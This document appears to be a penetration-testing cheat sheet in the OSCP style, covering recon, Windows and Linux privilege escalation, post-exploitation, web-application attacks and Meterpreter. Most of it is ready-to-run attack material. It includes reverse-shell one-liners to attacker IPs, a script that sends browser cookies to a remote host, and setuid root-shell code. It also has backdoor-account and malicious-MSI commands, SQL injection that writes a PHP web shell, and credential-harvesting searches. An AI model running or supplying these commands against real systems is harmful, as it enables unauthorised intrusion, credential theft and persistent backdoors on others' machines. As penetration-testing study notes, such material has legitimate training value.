1.Various Tricks
Upgrading
simple shells to fully interactive TTYs
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
Temporary Web Server
python -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"
php -S 0.0.0.0:8888
Use Nmap to remotely execute
commands through SQL
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse <victim_ip> -p1433 --script-args mssql.username=sa,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net user backdoor backdoor123 /add"
nmap -Pn -n -sS --script=ms-sql-xp-cmdshell.nse 10.11.1.31 -p1433 --script-args mssql.username=<sql_user>,mssql.password=<sql_password>,ms-sql-xp-cmdshell.cmd="net localgroup administrators backdoor /add"
Make browser appear as a search
engine
Use curl (serch engine agents: googlebot, slurp, msnbot…)
curl -A "'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')"
'http://<victim_ip>/robots.txt'
Change headers
of a http request using curl
Example:
check for shellshock vulnerability: (PoC: '() { :; }; echo “CVE-2014-6271
vulnerable”' bash -c id )
curl -H 'User-Agent: () { :; }; echo "CVE-2014-6271 vulnerable" bash -c id' http://10.11.1.71/cgi-bin/admin.cgi
Execute process as
another user (with credentials)
1.
Create a ps1 file e.g.
run.ps1 with powershell commands as below:
secpasswd = ConvertTo-SecureString "<admin_pass_clear_text>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<Admin_username>", $secpasswd)
$computer = "<COMPUTER_NAME>"
[System.Diagnostics.Process]::Start("C:/users/public/<reverse_shell.exe>","", $mycreds.Username, mycreds.Password, $computer)
1.
Upload run.ps1 to
victim's machine
2.
Execute powershell
command:
powershell -ExecutionPolicy Bypass -File
c:\users\public\run.ps1
Get a root
shell from MySQL
https://infamoussyn.com/2014/07/11/gaining-a-root-shell-using-mysql-user-defined-functions-and-setuid-binaries/
Setuid binary
for root shell
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system("/bin/bash");
}
Alternatively
#include <stdio.h>
#include <unistd.h>
main()
{
setuid(0);
execl("/bin/sh","sh",0);
}
gcc -o rootme rootme.c
chown root:root && chmod 4777 /var/tmp/rootme
Alternatively
cp /bin/sh /tmp/root_shell; chmod a+s /tmp/root_shell;
/tmp/root_shell -p
Leverage xp_cmdshell
to get a shell
sqsh -S <ip_address> -U sa -P <password>
exec sp_configure ‘show advanced options’, 1
go
reconfigure
go
exec sp_configure ‘xp_cmdshell’, 1
go
reconfigure
go
xp_cmdshell 'dir C:\'
go
Bypassing
white-listing
http://subt0x10.blogspot.com/2017/04/bypass-application-whitelisting-script.html
Create small
shellcode
msfvenom -p windows/shell_reverse_tcp -a x86 -f
python --platform windows LHOST=<ip> LPORT=443 -b "\x00"
EXITFUNC=thread --smallest -e x86/fnstenv_mov
2.RECON
Use
datasploit as a Recon framework
https://github.com/DataSploit/datasploit
Run web
scanners
dirb http{s}://<ip_address>:<port> /usr/share/wordlist/dirb/{common/small/vulns}.txt
gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,301,302,307,403,500' -e
gobuster -u http://10.11.1.71/ -w /usr/share/seclists/Discovery/Web_Content/cgis.txt -s '200,204,403,500' -e
nikto -port {web ports} -host <ip_address> -o <output file.txt>
Use
/usr/share/seclists/Discovery for some good word lists
Check for SMB vulnerabilities
We don't
want to run smb-brute or smb-flood because they might lock out accounts or
cause a DoS to the services
nmap -p139,445 -T4 -oN smb_vulns.txt -Pn --script not brute and not dos and smb-* -vv -d 10.11.1.1-254
3.Window Privilege
Escalation
Information
Gathering
+ What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
+ Get the hostname and username (if
available)
+ Learn about your environment
List other users on the box
net users
net user <username>
Networking/Routing Info
ipconfig /all
route print
arp -A
Active Network Connections
Firewall Status (only on Win XP
SP2 and above)
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule all
Scheduled tasks
schtasks /query /fo LIST /v
+ Check
how Running processes link to started services
+ Windows
services that are started:
+ Driver
madness (3rd party drivers may have holes)
Check systeminfo output against
exploit-suggester
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
+ Run
windows-privesc script
https://github.com/pentestmonkey/windows-privesc-check
WMIC
Windows Management Instrumentation Command Line
Windows XP requires admin
+ Use wmic_info.bat script for automation
http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar
+ System Info
wmic COMPUTERSYSTEM get TotalPhysicalMemory,caption
wmic CPU Get /Format:List
+ Check patch level
wmic qfe get Caption,Description,HotFixID,InstalledOn
1.
Look for privilege
escalation exploits and look up their respective KB patch numbers. Such
exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011
(KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799)
2.
After enumerating the OS version
and Service Pack you should find out which privilege escalation vulnerabilities
could be present. Using the KB patch numbers you can grep the installed patches
to see if any are missing
3.
Search patches for
given patch
wmic qfe get
Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.."
/C:"KB.."
Examples:
Windows 2K SP4 - Windows 7 (x86):
KiTrap0D (KB979682)
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979682"
Windows
Vista/2008 6.1.6000 x32,Windows Vista/2008 6.1.6001 x32,Windows 7 6.2.7600
x32,Windows 7/2008 R2 6.2.7600 x64. (no good exploit - unlikely Microsoft
Windows Vista/7 - Elevation of Privileges (UAC Bypass))
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802"
Stored
Credentials
1.
Directories that contain the configuration files (however better
check the entire filesystem). These files either contain clear-text passwords
or in a Base64 encoded format.
2. C:\sysprep.inf
3. C:\sysprep\sysprep.xml
4. %WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
2
When the box is
connected to a Domain:
a.
Look for Groups.xml in
SYSVOL
GPO preferences can be used to create local users on domain. So passwords might
be stored there. Any authenticated user will have read access to this file. The
passwords is encryptes with AES. But the static key is published on the msdn
website. Thus it can be decrypted.
b.
Search for other
policy preference files that can have the optional “cPassword” attribute set:
Services\Services.xml: Element-Specific Attributes
ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
Printers\Printers.xml: SharedPrinter Element
Drives\Drives.xml: Element-Specific Attributes
DataSources\DataSources.xml: Element-Specific Attributes
3
Automated Tools
a. Metasploit Module
post/windows/gather/credentials/gpp
post/windows/gather/enum_unattend
b. Powersploit
https://github.com/PowerShellMafia/PowerSploit
Get-GPPPassword
Get-UnattendedInstallFile
Get-Webconfig
Get-ApplicationHost
Get-SiteListPassword
Get-CachedGPPPassword
Get-RegistryAutoLogon
4 Search
filesystem:
a.
Search for specific
keywords:
dir /s *pass* == *cred* == *vnc* == *.config*
b.
Search certain file
types for a keyword
findstr /si password *.xml *.ini *.txt
c. Search
for certain files
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir /b /s vnc.ini
d. Grep
the registry for keywords (e.g. “passwords”)
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKLM\SOFTWARE\Microsoft\Windows
NT\Currentversion\Winlogon"
reg query
"HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
reg query
"HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
e. Find writeable files
I.
/a is to search for
attributes. In this case r is read only and d is directory. The minus signs
negate those attributes. So we're looking for writable files only.
II.
/s means recurse
subdirectories
III.
/b means bare format.
Path and filename only.
Trusted Service
Paths
1.List all unquoted
service paths (minus built-in Windows services) on our compromised machine:
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Suppose we found:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
If you look at the registry entry for this service with Regedit
you can see the ImagePath value is:
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
To be secure it should be like this:
“C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe”
When Windows attempts to run this service, it will look at the
following paths in order and will run the first EXE that it will find:
C:\Program.exe
C:\Program Files.exe
C:\Program Files(x86)\Program Folder\A.exe
...
2. Check permissions
of folder path
icacls "C:\Program Files (x86)\Program
Folder"
3. If we can write in
the path we plant a backdoor with the same name with the service and restart
the service.
Metasploit module:
exploit/windows/local/trusted_service_path
Vulnerable
Services
Search for services that have a binary path (binpath) property which
can be modified by non-Admin users - in that case change the binpath to execute
a command of your own.
Note: Windows XP shipped with several vulnerable built-in
services.
Use accesschk from SysInternals to search for these vulnerable
services.
https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx
For Windows XP, version 5.2 of accesschk is needed:
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
accesschk.exe -qdws Users C:\Windows\
Then query the service using Windows sc:
sc qc <vulnerable service name>
Then change the binpath to execute your own commands (restart of
the service will most likely be needed):
sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
sc stop <vuln-service>
sc start <vuln-service>
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
sc stop <vuln-service>
sc start <vuln-service>
Note - Might need to use the depend attribute explicitly:
sc stop <vuln-service>
sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
sc start <vuln-service>
Metasploit
module:
exploit/windows/local/service_permissions
AlwaysInstallElevated
AlwaysInstallElevated is a setting that allows non-privileged users
the ability to run Microsoft Windows Installer Package Files (MSI) with
elevated (SYSTEM) permissions.
Check if these 2 registry values are set to “1”:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If they are, create your own malicious msi:
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
Then use msiexec on victim to execute your msi:
msiexec /quiet /qn /i C:\evil.msi
Metasploit module:
exploit/windows/local/always_install_elevated
Bypassing AV
§ Use
Veil-Evasion
§ Create
your own executable by “compiling” PowerShell scripts
§ Use
Metasploit to substitute custom EXE and MSI binaries. You can set EXE::Custom
or MSI::Custom to point to your binary prior to executing the module.
Getting GUI
+ Using meterpreter, inject vnc session:
run post/windows/manage/payload_inject payload=windows/vncinject/reverse_tcp lhost=<yourip> options=viewonly=false
+ Enable
RDP:
netsh firewall set service RemoteDesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
sc config TermService start= auto
net start Termservice
netsh.exe
firewall
add portopening TCP 3389 "Remote Desktop"
OR:
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow
program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the
Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes
profile=private,domain localport=3389 protocol=tcp
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow
program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the
Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes
profile=private,domain localport=3389 protocol=udp
OR
(meterpreter)
run post/windows/manage/enable_rdp
Python exploits
Compiling Python Exploits for Windows on Linux
1.
install pyinstaller of windows with wine on Kali and then
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile 18176.py
2.
run `pyinstaller` located under the same directory as Python
scripts
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py
3.
Execute with wine
wine ~/.wine/drive_c/dist/HelloWorld.exe
File Transfers
limit commands on shell to be non-interactive
TFTP
Windows XP and Win 2003 contain tftp client. Windows 7 do not by
default
tfpt clients are usually non-interactive, so they could work
through an obtained shell
atftpd --daemon --port 69 /tftp
Windows> tftp -i 192.168.30.45 GET nc.exe
FTP
Windows contain FTP client but they are usually
interactive
Solution: scripted parameters in ftp client: ftp -s
ftp-commands
echo open 192.168.30.5 21> ftp.txt
echo USER username password >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
VBScript
wget-vbs script echo trick again, copy paste the commands in the
shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.102/evil.exe test.txt
Powershell
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.102/powerup.ps1" >>wget.ps1
echo $file = "powerup.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Webdav
On kali linux install wsgidav and cheroot
pip install wsgidav cheroot
Start the wsgidav on a restricted folder:
mkdir /tmp/webdav_folder
wsgidav --host=0.0.0.0 --port=80 --root=/tmp/webdav_folder
On Windows mount this folder using net use:
net use * http://YOUR_IP_ADDRESS/
BitsAdmin
bitsadmin /transfer n http://domain/file c:%homepath%file
debug.exe
First use upx or similar to compress the executable:
Then use exe2bat to convert the executable into a series of echo
commands that are meant to be copied pasted in the remote system:
wine exe2bat.exe nc.exe nc.txt
Then copy paste each command from nc.txt in the remote system.
The commands will gradually rebuild the executable in the target machine.
certuril
certutil.exe -URL
will fetch ANY file and download it here:
C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
Resources
4.Window Post Exploitation
Backdoor User
net user backdoor backdoor123 /add
net localgroup administrators backdoor /add
net localgroup "Remote Desktop Users" backdoor /add
Enabling RDP
netsh firewall set service RemoteDesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t
REG_DWORD /d 0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
sc config TermService start= auto
net start Termservice
netsh.exe
firewall
add portopening TCP 3389 "Remote Desktop"
OR:
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow
program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the
Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes
profile=private,domain localport=3389 protocol=tcp
etsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow
program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the
Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes
profile=private,domain localport=3389 protocol=udp
OR
(meterpreter)
run post/windows/manage/enable_rdp
Dumping
Credentials
in order to prevent the
“clear-text” password from being placed in LSASS, the following registry key
needs to be set to “0” (Digest Disabled):
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)
This registry key is worth
monitoring in your environment since an attacker may wish to set it to 1 to
enable Digest password support which forces “clear-text” passwords to be placed
in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2.
Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value,
so it would have to be created. The existence of this key on these systems may
indicate a problem.
Remote Commands
winexe --user=backdoor%laKK195@19z //10.11.1.218 ipconfig
winexe --user=backdoor%laKK195@19z --system //10.11.1.218 cmd
OR
OR
nmap -sU -sS --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p U:137,T:139 <host>
5.Linux Privilege Escalation
Information
Gathering
cat /etc/issue
cat /etc/*-release
cat /proc/version
uname -a
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
lsb_release -a
+ Check sudoers
Check password files
Check for misconfigurations - i.e Is shadow readable? Is passwd writeable?
cat /etc/passwd
cat /etc/shadow
ls -l /etc/passwd
ls -l /etc/shadow
+ Learn
your environment
Search for misconfigured PATH variables. Do they prioritize searching for
executable files from a non-secure (i.e. world-writeable) path?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
cat ~/.bash_history
env
set
Check history files
You might find plaintext passwords in there
+ Check
cronjobs
Search for jobs using programs that run with root privileges and are
potentially write-accessible by low-privileged users
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
+ Check
processes running as root for vulnerabilities
ps aux | grep root
ps -ef | grep root
Search
files for plaintext credentials
grep -ir user *
grep -ir pass *
+ Find
writable configuration files
find /etc/ -writable -type f 2>/dev/null
+ Run
privesc scripts
LinEnum - https://www.rebootuser.com/?p=1758
linuxprivchecker.py - http://www.securitysift.com/download/linuxprivchecker.py
unix-privesc-check - https://github.com/pentestmonkey/unix-privesc-check
Escaping jail
shells
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
Resources
6.Linux Post Exploitation
Backdooring
Linux
+ Adding a backdoor user (super visible to
sysadmin)
Adding users
/usr/sbin/adduser backdoor
passwd backdoor
echo "backdoor ALL=(ALL) ALL" >> /etc/sudoers
+ Plant a rootkit (might make system
unstable)
Userland
rootkits
§ + more
stable
§ + more
likely to remain planted after system updates
§ - more
visible
§ - less
control
Kernel rootkits
§ + less
visible
§ +
complete control
§ - more
unstable
§ - more
likely to cause problems with system updates
https://github.com/n1nj4sec/pupy
https://github.com/r00tkillah/HORSEPILL
http://r00tkit.me/
Resources
7.Web Applications
General
Try reading the php source code of the web application:
http://<ip>/script.php/?-s
Do you see any LFI/RFI vulnerability posted by Nikto? Try
Check for Input Validation in forms:
1′ or 1=1 limit 1;# AND 1′ or 1=1--)
Stealing
Cookies
<iframe src="http://10.11.0.5/report" height = "0" width = "0"></iframe>
<script>
new Image().src="http://10.11.0.5/bogus.php?output="+document.cookie;
</script>
File Inclusion Vulnerabilities
php.ini values:
register_globals
allow_url
allow_url_fopen
allow_url_include
terminate our request with a null
byte () (possible in php below 5.3)
For
LFI/RFI attacks, this might be useful:
Contaminating
Log Files
contaminate log file to cause them to contain PHP code to be
later used in LFI attack
nv -nv 192.168.30.35 80
<?php echo shell_exec($_GET['cmd']);?>
thus, cmd= is introduced into the php execution and now by
including the logfile you can execute any command
SQL Injection
Classic Authentication Bypass
select * from users where name ='any' or 1=1;#'
select * from users where name ='any' or 1=1 limit 1;#'
Error Based
Enum
order by
union all operator → allows us to add our own select queries to
the original but the new select needs to have the same number of columns as the
original columns statement
union all select 1,2,3,4,5,6
union all select 1,2,3,4,@@version,6
union all select 1,2,3,4,user(),6
union all select 1,2,3,4,table_name,6 FROM information_schema.tables
union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'
union select 1,2,name,4,password,6 FROM users
OR
http://10.11.1.35/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a,password),6 FROM users
Blind SQL
Injection
if they have different results then it is an indication of
possible injection spot
use time as a test parameter for query
sleep(5)
select IF(MID(@@version,1,1) = '5', SLEEP(5), 0);
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
http://10.11.1.35/comment.php?id=738 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
SQLMap
sqlmap -u http://192.168.30.35 --crawl=1
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --dump --threads=5
sqlmap -u http://192.168.30.35/comment.php?id=738 --dbms=mysql --os-shell
Install addon “Modify Headers”
In some cases, to look like you have a different IP, you can
change the value of the X-Forwarded-For
8. Meterpreter
Basic Commands
sysinfo
getpid
getuid
ps
ps -S notepad.exe
kill <pid>
ipconfig
route
migrate <PID>
getsystem
getprivs
use priv
hashdump
shell
background
File System
Commands
ls
pwd
cd
del <file>
cat <file>
edit <file>
upload <src_file> <dst_file>
download <src_file> <dst_file>
getwd
getlwd
Port Forwarding
We have compromised victim1 with meterpreter session_id.
Background meterpreter and add the route below. It will redirect all traffic
for the above victim2_subnet through victim1.
route add <victim2 subnet> <netmask> <session_id>
route -h
route list
route delete <victim2_subnet> <netmask> <session+id>
Forwards traffic from port l on Kali(localhost) to port p of
Target2 through the compromised Target1
portfwd
portfwd add -l 1111 -p 2222 -r Target2
portfwd remove -l 1111 -p 2222 -r Target2
Execute
Processes
Execute cmd.exe and interact with it
Execute cmd.exe with all available tokens
Execute cmd.exe with all available tokens and make it a hidden
process
execute -f cmd.exe -i -H -t
1.
H Create the process
hidden from view
2.
a Arguments to pass to
the command
3.
i Interact with the
process after creating it
4.
m Execute from memory
5.
t Execute process with
currently impersonated thread token
Run Meterpreter-based
scripts; for a full list check the scripts/meterpreter directory
Registry
Interact, create, delete, query, set, and much more in the
target’s registry
commands:
enumkey ->Enumerate the supplied registry key
createkey / deletekey -> Creates/deletes the supplied registry key
setval / queryval -> Set/query values from the supplied registry key
Options:
-d -> Data to store in the registry value
-k -> The registry key
-v -> The registry value name
Tokens
use incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAME\\USERNAME
steal_token PID
drop_token
rev2self
Sniffing
use sniffer
sniffer_interfaces
sniffer_dump interfaceID pcapname
sniffer_start interfaceID packet-buffer
sniffer_stats interfaceID
sniffer_stop interfaceID
Post
Exploitation
add_user username password -h ip
add_group_user “Domain Admins” username -h ip
clearav
timestomp
screenshot
keyscan_start
keyscan_dump
keyscan_stop
uictl enable keyboard/mouse
setdesktop number
reboot
run post/windows/manager/enable_rdp
Run
msfmap
Download it from http://code.google.com/p/msfmap
load msfmap
msfmap
References
9. SHELLS
bash -i >& /dev/tcp/10.11.0.102/8080 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
perl -e 'use Socket;$i="10.11.0.102";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.0.102",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
always check for nc, nc.traditional or netcat, or ncat with the
full path if plain nc doesn't work!
RESOURCES
CREDIT -> https://www.sock-raw.org/wiki/doku.php/start
